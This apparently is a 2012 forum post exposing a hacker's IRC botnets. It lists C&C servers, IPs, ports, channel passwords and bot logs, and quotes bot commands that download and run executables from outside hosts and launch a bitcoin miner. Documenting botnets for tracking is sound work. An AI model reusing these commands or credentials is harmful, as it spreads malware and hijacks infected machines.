Mystical Megapost (Botnets of all types) (Hosted by Ukraine Ukrainian Internet Names Center Ltd and Netherlands Maasdijk Worldstream)

As Mystical has now recently been banned from hackforums, I thought I would make an informative megapost of botnets he has or is currently using.

vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)

Resolved vandersand.no-ip.biz to 199.115.230.138
Server: vandersand.no-ip.biz
Port: 6654
Channel: #Insomnia
Channel password: frosty
* Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5
* Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012
Botnick: {IT|XP-32a}uwryxvf
While I was in the channel he downloaded a bitcoin miner
Dextermania.exe hxxp://versx.net/x/bcm/bitcoin-miner.exe http://pool.bitclockers.com:8332 -u Dexter -p 19930924
Hosting

hacking-scene.ru (Athena ircbot hosted by Romania Voxility S.r.l.)

Still more Athena bots
Resolved hacking-scene.ru to 109.163.233.110
Server: hacking-scene.ru
Port: 34791
Password: 31337gAlAg23gnmbx331
Channel: #mafia
Password: hellas
#mafia           31      [+smntVMCuTk]
Current Global Users: 31  Max: 269
Hosting infos: http://whois.domaintools.com/109.163.233.110

cmjc.no-ip.biz (Athena ircbot hosted by France Roubaix Ovh Systems)

Found more Athena nets
Resolved cmjc.no-ip.biz to 5.39.44.120
Server: cmjc.no-ip.biz
Port: 6667
Channel: #kam
#kam             14      [+smntrVCT]
Channel: #vanrikki
Password: wiitasauce3991
#vanrikki        44      [+sntrVCTk]
Server is one of those used by cmjc.whhcd.info. I’m not sure why they used a no-ip for these bots, anyone can get that suspended easily. The servers host lots of skids,

cmjc.whhcd.info (Athena ircbot hosted by France Roubaix Ovh Systems)

Resolved cmjc.whhcd.info to 5.39.44.120
Resolved cmjc.whhcd.info to 176.31.33.45
Resolved cmjc.whhcd.info to 46.105.36.229
Server: cmjc.whhcd.info
Port: 6667
Channel: #MuustaHF
Channel password: hejij3cdp
Opers: Ddos
* [Ddos] (Ddos@I.Will.DDOS.Your.Ass): Ddos
* [Ddos] is a registered nick
* [Ddos] services.whhcd.info :Services for IRC Networks
* [Ddos] idle 158:10:19, signon: Wed Aug 29 23:26:30
* [Ddos] End of WHOIS list.
MuustaHF

gtfo.myprivatefile.com (irc botnet hosted in United States Clifton Park Search Guide Inc)

Resolved : [gtfo.myprivatefile.com] To [184.106.87.139]
Resolved : [gtfo.myprivatefile.com] To [66.152.109.69 13]
Resolved : [gtfo.myprivatefile.com] To [69.16.143.69 13]
Remote Host              Port Number
gtfo.myprivatefile.com   1337
PASS google_cache1tfsg4.tmp
NICK X[USA][XP-SP2]150351
USER 9092 “” “lol” :9092
JOIN #swarm swarm
NICK {NEW}X[USA][XP-SP2]020911
USER 0441 “” “lol” :0441
NICK X[USA][XP-SP2]075732
USER 5218 “” “lol” :5218
hosting infos: http://whois.domaintools.com/66.152.109.69

blah.swapixtreme.com (irc botnet hosted in United Kingdom Vooservers Ltd)

Resolved : [blah.swapixtreme.com] To [91.227.221.217]
Clients: I have 308 clients and 1 servers
Local users: Current Local Users: 308 Max: 1
Global users: Current Global Users: 309 Max: 1105
Remote Host            Port Number
blah.swapixtreme.com   7878
NICK [GSA]-274266
USER hhzegr 0 0 :[GSA]-274266
USERHOST [GSA]-274266
MODE [GSA]-274266 +xt
JOIN #b imallowed2020
hosting infos: http://whois.domaintools.com/91.227.221.217

Paypal Phishing Script hosted in Brazil Sao Paulo Telemar Norte Leste S.a.

I got this email today in my spam folder: Dear valued PayPal Customer, We’re constantly working to make PayPal safer, simpler and more convenient for our customers. This means that from time to time we have to verify and keep up to date your account. It has come to our attention that your PayPal account

kca.hopto.org (irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

Resolved : [kca.hopto.org] To [88.255.116.48]
Server: 88.255.116.48:1453
Nick: new[iRooT-XP-AUT]990453
Username: 9904
Server Pass: KCA
Joined Channel: #XXX with Password KCA
Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html”
Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!”
Private Message to Channel #XXX: “[Download]: Executed Successfully”
Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09Spreading

deuxexhre.org (ngrbot hosted by Romania Voxility)

deuxexhre.org resolved to 37.221.160.38
Server: deuxexhre.org
Port: 1090
Password: romeo
Channel: ##str
Channel Password: romeo
Channel topic:
* Topic for ##str is: *mdns http://alfonsoelpidio.com/hosts
* Topic for ##str set by drek0 at Wed Aug 29 11:22:21 2012
Bot sample from http://oberheimdmx.blogspot.co.uk/2012/08/dorkbot-falso-mensaje-de-amorenlinea.html
Hosting infos: http://whois.domaintools.com/37.221.160.38